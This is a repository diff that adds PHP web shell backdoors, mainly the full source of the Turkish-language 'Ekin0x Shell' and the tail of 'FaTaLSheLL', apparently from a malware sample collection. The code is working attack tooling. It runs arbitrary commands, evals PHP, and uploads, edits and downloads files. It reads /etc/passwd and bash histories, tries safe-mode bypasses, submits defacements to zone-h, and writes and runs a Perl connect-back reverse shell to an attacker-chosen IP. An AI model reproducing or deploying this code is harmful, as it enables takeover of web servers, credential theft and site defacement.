".$_POST['filename']."");break; + case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; + case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break; +}}} +//end function +?> + + +

FaTaLSheLL v1.0

+
| Shell | Ana Sayfa| Dosya Editle| Dosya Upload| Php Eval | <-Geri | Ýleri->|

+

 

+ +
Safe mode:
+ Fonksiyon Kýsýtlamasý:
+ Sistem:
+ Durum:
COPYRIGHT BY StarHack.oRg
\ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bo b/PHP/Backdoor.PHP.Agent.bo new file mode 100644 index 00000000..04c66855 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bo @@ -0,0 +1,613 @@ + + +";print"
$delmtxt
";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "";} +elseif(empty($name)&&empty($size)){print "";} +elseif(empty($size)){print "";} +else {print "";}} +function permcol($path){if (is_writable($path)){print ""; +callperms($path); print "";} +elseif (!is_readable($path)&&!is_writable($path)){print ""; +callperms($path); print "";} +else {print "";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> + + +Ekin0x Shell + + + + +";$ef=""; +$st=""; +$et="
";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +################# Ending of common variables ######################## + +print"";print"";print"
"; print"
## Ekin0x Shell ## +
"; print"
";print "
"; +print"";print"";print"
"; print"
";print "Home"; +print " - Geri"; +print " - phpinfo"; +if ($dlink=='phpinfo'){print phpinfo();die();} +print " - Base64 decode"; +print " - Url decode"; +print " - Url encode"; +print " - Md5"; +print " - Izinleri Kontrol Et"; +print " - File source"; +print " - Quick index"; +print " - Zone-h"; +print " - Mail"; +print " - Cmd help"; +if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase'])); +print "

Result is : $sfnt".$cbase."$efnt"; die();} +if ($dlink=="basepw"){ print "

[ Base64 - Decoder ]"; +print $sf;input ("text","ncbase",$ncbase,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); +print "

Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ +print "

[ Url - Decoder ]"; print $sf; +input ("text","nurld",$nurld,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "

Result is : $sfnt".$urlenc."$efnt"; die();} +if ($dlink=='urlen'){print "

[ Url - Encoder ]"; +print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} +if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); +print "

Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ +print "

[ MD5 - Encoder ]"; +print $sf;input ("text","nmdf",$nmdf,35);print " "; +input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; +print "

";print "

";print "

";die();} +function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ +print "

[ Sorry, U choosed an empty file or the file not exists ]";die();} +elseif(isset($showsc)&&filesize($showsc) !=="0") { +print "

"; +if (!show_source($showsc)||!function_exists('show_source')){print "
[ Sorry can't complete the operation ]
";die();}print "
";die();}}if ($dlink=='showsrc'){ +print "

: Choose a php file to view in a color mode, any extension else will appears as usual :";print "

"; +input ("text","showsc","",35);print " "; +input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));} +if ($dlink=='cmdhlp'){ +print "

: Insert the command below to get help or to know more about it's uses :";print ""; +input ("text","hlp","",35);print " "; +input ("submit","","Help","");print $ef; die();} +if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp']; +print "

[ The command is $sfnt".$hlp."$efnt ]"; +$hlp = escapeshellcmd($hlp);print "

"; +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "
[ Sorry can't complete the operation ]
";}else {print "
";
+if(!callfuncs("man $hlp | col -b")){print "
[ Finished !! ]";}print "
";}print "
";die();} +if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) +{if (touch ($_REQUEST['indx'])==true){ +$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); +fclose($fp);print "

[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

";print "
[ Yeniden Editle +] -- [ Curr-Dir ]
";die(); }else {print "

[ Sorry, Can't create the index !! ]

";die();}} +if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ +print $sf."
";print "

"; +input ("text","indx","Index-name",35);print " "; +input ("submit","qindsub","Create","");print $ef;die();} +if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ +$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; +if (mail($mailto,$subj,$mailtxt)){print "

[ Mail sended to $sfnt".$mailto." $efnt successfully ]

"; die();}else {print "

[ Error, Can't send the mail ]

";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

[ Error, Can't send the mail ]

";die();} +if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ +print $sf."
";print "

";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; +input ("submit","mailsub","Send-mail","");print $ef;die();} +if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} +function callzone($nscdir){ +if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} +else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} +fwrite ($fpz,"\$arq = @ARGV[0]; +\$grupo = @ARGV[1]; +chomp \$grupo; +open(a,\"<\$arq\"); +@site = ; +close(a); +\$b = scalar(@site); +for(\$a=0;\$a<=\$b;\$a++) +{chomp \$site[\$a]; +if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } +print \"[+] Sending \$site[\$a]\n\"; +use IO::Socket::INET; +\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; +print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; +print \$sock \"Accept: */*\r\n\"; +print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; +print \$sock \"Accept-Language: pt-br\r\n\"; +print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; +print \$sock \"Connection: Keep-Alive\r\n\"; +print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; +print \$sock \"Host: old.zone-h.org\r\n\"; +print \$sock \"Content-Length: 385\r\n\"; +print \$sock \"Pragma: no-cache\r\n\"; +print \$sock \"\r\n\"; +print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; +close(\$sock);}"); +if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); +}else{print "

[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet']; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "[ Can't complete the operation !! ]";} +else {callfuncs("chmod 777 $zpl;chmod 777 $li"); +ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); +print "

[ All sites should be sended to zone-h.org successfully !! ]";die();} +}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ +print $sf."
";print "

";input ("text","zonet","Hacker-name",35);print " "; +input ("submit","zonesub","Send","");print $ef;die();} +print "
"; print"
";print "
"; +function inisaf($iniv) { $chkini=ini_get($iniv); +if(($chkini || strtolower($chkini)) !=='on'){print"Kapali ( Guvenlik Yok )";} else{ +print"Acik ( Guvenli )";}}function inifunc($inif){$chkin=ini_get($inif); +if ($chkin==""){print " None";} +else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} +elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); +while (!feof($opop)){ $nval= fgetc($opop);}} +elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ +ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} +if($nval=$owhich){print"ON";} +else{print"OFF";} } +print""; +print"
"; print"

"; +print"Safe-mode :\t";print inisaf('safe_mode');print "";print"
"; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print ""; print""; print""; print""; print""; print""; print""; print "
"; +print "
"; print"
Mysql : "; +callocmd('which mysql','/usr/bin/mysql'); +print"
"; print"
Perl : "; +callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"
"; print"
Gcc : "; +callocmd('which gcc','/usr/bin/gcc'); print"
"; +print"
Curl : "; callocmd('which curl','/usr/bin/curl'); print"
"; print"
GET : "; +callocmd('which GET','/usr/bin/GET'); +print"
";print"
Wget : "; +callocmd('which wget','/usr/bin/wget'); +print"
"; print"
Lynx : "; +callocmd('which lynx','/usr/bin/lynx'); +print"
"; }print "

"; +print "IP Numaran : ".$REMOTE_ADDR."
"; +print "Server IP : ".$SERVER_ADDR.""; +print"
".$SERVER_SIGNATURE.""; +print "Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."
"; +print "Engelli Fonksiyonlar : ";inifunc(disable_functions);print"
"; +print "Kimsin : "; callfuncs('id');print"
Os : "; +if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print php_uname(); print "/";print PHP_OS;} +else {callfuncs('uname -a');}}print"
"; +print"Php-versiyon : ".phpversion(); print"
Current-path : "; +print $nscdir."     [ ";permcol($nscdir);print " ]"; +print"
";print "Shell'in Burda : " .__file__; +print"
Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / "; +print"Bos Alan: "; readable_size(disk_free_space($nscdir)); +print "
"; print"

"; +if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); +if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; } +else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir'])) +{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} +else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ +$ncfile=trim($_REQUEST['cfile']); +if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} +else{ $mess3= "Dosya Olustur/Sil";}} +elseif(isset($_REQUEST['delfile'])){ +$ndfile=trim($_REQUEST['cfile']); +if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} +else {$mess3= "Dosya Olustur/Sil";}} +else {$mess3="Dosya Olustur/Sil";} +class upload{ function upload($file,$tmp){ +$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";} +if (@copy($tmp,$nscdir."/".$file)){ +print "
: $file uploaded successfully :
"; }else{print "
: Error uploading $file :
";} } } } +$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){ +$ustname=trim ($_REQUEST['ustname']);ob_start(); +if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);} +if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');} +if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);} +if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);} +if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);} +if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);} +if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();} +if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&& +!isset($_REQUEST['rfiletxt'])){ +if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){ +$files[] = $filename; sort($files);}print "
"; +print"
"; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print "";if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; foreach ($files as $nfiles){ +if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");} +if (is_writable("$nscdir/$nfiles")){ +$scmess2= "
Evet";}else {$scmess2="
Hayir";}if (is_readable("$nscdir/$nfiles")){ +$scmess3= "
Evet";}else {$scmess3= "
Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "
Klasör";}else{$scmess4= "
Dosya";} +print"
"; print ""; print ""; +print""; +print ""; +print ""; print "";print ""; if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; print ""; +}print "
"; +print "
Dosyalar";print "
";print "
Boyut";print "
";print "
Yazma";print "
";print "
Okuma";print "
";print "
Tür";print "
";print "
Düzenleme";print "
";print "
Adlandirma";print "
";print "
Indir";print "
";print "
Group";print "
";print "
Izinler";print "
"; +if (is_dir($nfiles)){print "[ $nfiles ]
";}else {print "$nfiles
";} +print"
"; +print "
"; +if (is_dir("$nscdir/$nfiles")){print "Klasör";} +elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";} +print "
"; +print "
$scmess2"; print "
"; +print "
$scmess3"; print "
"; +print "
$scmess4"; print"
";if(is_file("$nscdir/$nfiles")){ +print "
Düzenle";}else {print "
Düzenle
";}print"
";print "
Adlandir";print"
"; +if(is_file("$nscdir/$nfiles")){ +print "
indir";}else {print "
indir
";}print"
"; +print "
";owgr($nfiles); +print "
";print"
";print "
"; +permcol("$nscdir/$nfiles");print "
";print"
";print "
";}else {print "

[ Can't open the Dir, permission denied !! ]

";}} +elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ +if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "

[ Executed command ][$] : ".$_REQUEST['cmd']."
";} +print "
".$sta; +if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);} +elseif(isset($_REQUEST['eval'])){ +ob_start();eval(stripslashes(trim($_REQUEST['eval']))); +$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);} +elseif (isset($_REQUEST['subqcmnds'])){ +if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');} +if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');} +if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');} +if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');} +if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');} +if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');} +if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');} +if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');} +if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');} +if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');} +if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');} +if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');} +if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');} +}print $eta."
";} +function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); +if(is_readable($rfile)&&is_file($rfile)){ +$fp=fopen ($rfile,"r");print"
"; +print "
[ Editing ".basename($rfile)." ] [ Geri ] [ Curr-Dir ]

"; +print $sf."";if (is_writable($rfile)){ +print "
".$ef;}else +{print "
[ Can't edit ".basename($rfile)." ]

";}print "

";} +elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "
[ You selected a wrong file name or you don't have access !! ]

";}} +function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']); +if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+"); +$rfiletxt=stripslashes($_REQUEST['rfiletxt']); +fwrite ($rffp,$rfiletxt);print "
+[ ".basename($hidrfile)." Saved !! ] +[ Curr-Dir ] [ Edit again ] +

";fclose($rffp);} +else {print "
[ Can't save the file !! ] [ Curr-Dir ] [ Back ]

";}} +if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);} +elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);} +function callperms($chkperms){ +$perms = fileperms($chkperms); + +if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; +} else { + // Unknown + $info = 'u'; +} + +// Owner +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + +// Group +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + +// World +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); print $info;} + + function readable_size($size) { + +if ($size < 1024) { +print $size . ' B'; +}else {$units = array("kB", "MB", "GB", "TB"); +foreach ($units as $unit) { +$size = ($size / 1024); +if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}} +if($dlink=='ren'&&!isset($_REQUEST['rensub'])){ +print ""; +print "
".$sf;input ("text","ren",$_REQUEST['ren'],20);print " "; +input ("text","renf","New-name",20);print " "; +input ("submit","rensub","Rename" ,"");print $ef;die();}else print ""; +if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){ +if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){ +print"
[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]
";print "";die();}else{print "
[ Yeniden Adlandirilamiyor ]
"; +print "";die();}}function fget($nscdir,$sf,$ef){print "
"; +print "
[ Editing ".basename($_REQUEST['edit'])." ] [ Geri ] [ Curr-Dir ]
"; +print $sf."
"; +if (is_writable($_REQUEST['edit'])){ +print "
".$ef;}else {print "
[ Can't edit +".basename($_REQUEST['edit'])." ]

";}}function svetxt(){ +$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){ +$nedittxt=stripslashes($_REQUEST['edittxt']); +fwrite ($fp,$nedittxt);print "
[ ".basename($_REQUEST['edit'])." Saved !! ]
";fclose($fp);}else {print "
[ Can't save the file !! ]
";}} +if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval'])) +{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt'])) +{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){ +$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); +$fileowner=$fileownerarray['name']; $fileg=filegroup($file); +$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name']; +print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){ +if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}} +elseif(isset($_REQUEST['mve'])){ +if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);} +}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";} +if (isset ($_REQUEST['safefile'])){ +$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ +if(empty($_GET['file'])){if(empty($_POST['file'])){ +print "
[ Please choose a file first to read it using copy() ]
"; +} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} +$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ +$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo);echo "
".$sta.htmlspecialchars($tekst).$eta."
";unlink($temp);} else { +print "
Sorry, Can't read the selected file !! +

";}}if (isset ($_REQUEST['inifile'])){ +ini_restore("safe_mode");ini_restore("open_basedir"); +print "
".$sta;
+if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
";} +if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);} +function callback($nscdir,$bip,$bport){ +if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";} +if (is_writable($nscdir)){ +$fp=fopen ("back.pl","w");$backpl='back.pl';} +else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';} +fwrite ($fp,"use Socket; +\$system='$epath'; +\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\"; +echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo; +echo \"[ User perms ][$]\";echo \"`id`\";echo; +echo \"[ Start shell ][$]\";'; + +if (!\$ARGV[0]) { + exit(1); +} +\$host = \$ARGV[0]; +\$port = 80; +if (\$ARGV[1]) { + \$port = \$ARGV[1]; +} +\$proto = getprotobyname('tcp') || die('Unknown Protocol\n'); +socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n'); +my \$target = inet_aton(\$host); +if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) { + die('Unable to Connect\n'); +} +if (!fork( )) { + open(STDIN,'>&SERVER'); + open(STDOUT,'>&SERVER'); + open(STDERR,'>&SERVER'); +print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]'; +print '\n[ A-S-T team ][ Lezr.com ]\n\n'; + system(\$sys);system (\$system); + exit(0); } + ");callfuncs("chmod 777 $backpl"); +ob_start(); +callfuncs("perl $backpl $bip $bport"); +ob_clean(); +print "
[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]
+[ Check your connection now, if failed try changing the port number ]
+[ Or Go to a writable dir and then try to connect again ]
+[ Return to the Current dir ] [ Curr-Dir ] +

";}if (isset($_REQUEST['uback'])){ +$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; +if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");} +elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");} +elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}} +delm("# Komut ÇAlistir #");print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +delm("");print "
"; +print $st.$c1."
".$mess3.$ec; +print $c2.$sf."
";input("text","cfile","",53); +input("hidden","scdir",$nscdir,0);print "
"; +input("submit","crefile","Olustur",""); +print " ";input("submit","delfile","Sil",""); +print "
".$ef.$ec.$et."
".$st.$c1; +print "
Enter the command to execute";print $ec; +print $c2.$sf."
"; +input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"
"; +input("submit","","Execute","");print "
".$ef.$ec.$et."
";print $st.$c1; +print "
$mess".$ec.$c2.$sf."
"; +input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "
"; +input("submit","credir","Create-D","");print " "; +input("submit","deldir","Delete-D",""); +print "
".$ef.$ec.$et."
";print $st.$c1; +print "
Dosya Düzenle/Oku".$ec;print $c2.$sf."
"; +input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "
"; +input("submit","","Oku-Düzenle","");print "
".$ef.$ec.$et."
";print $st.$c1; +print "
Dizin'i Göster
";print $ec.$c2.$sf."
"; input("text","scdir",$nscdir,59);print"
"; +input("submit","","Göster","");print " "; +input("reset","","R00T","");print "
".$ef.$ec.$et."
";print $st.$c1; +print "
Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."
"; +input("file","upfile","",40);input("hidden","scdir",$nscdir,0); +input("hidden","up",$nscdir,0); +print"
";input("submit","","Upload","");print "
".$ef.$ec.$et."
";print "
"; +print $st.$c1."
Execute php code with eval()
"; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print " 
"; +input('submit','evsub','Execute');print " "; +input('Reset','','Reset');print " "; +print "
".$ec.$ef.$et; +print "
"; +print $st.$c1."
Execute useful commands
"; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print "
";print"
"; +print $ec.$ef.$et."
";delm(""); +print ""; +print "
"; +print $st.$c1."
".$cpmvmess."
"; +print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15); +print " To "; +input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " "; +input("submit","cpy","Copy","");print " ";input("submit","mve","Move",""); +print "".$ec.$ef.$et; +print "
"; +print $st.$c1."
Cok kullanilan Komutlar
"; +print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0); +print " ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "".$ec.$ef.$et; +print "
";delm(": Safe mode bypass :"); +print ""; +print "
"; +print $st.$c1."
Using copy() function
"; +print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
"; +print $st.$c1."
Using ini_restore() function
"; +print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
";delm("# Backdoor Baglantisi #"); +print ""; +print "
"; +print $st.$c1."
Backdoor ile Baglan
"; +print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " "; +input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Connect","");print " ";input("reset","","Reset",""); +print "".$ec.$ef.$et;print "
";print $st.$c1."
Yüklenmis Backdoor
"; +print $ec.$c2.$sf." ";print "";print " "; +input("text","uback","back.pl",23);print " "; +input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect"); +print "".$ec.$ef.$et;print "
"; +print "
"; print"
"; +print"
Copyright is reserved to Ekin0x
[ By Cyber Security TIM Go to : www.cyber-warrior.org ]"; +print"
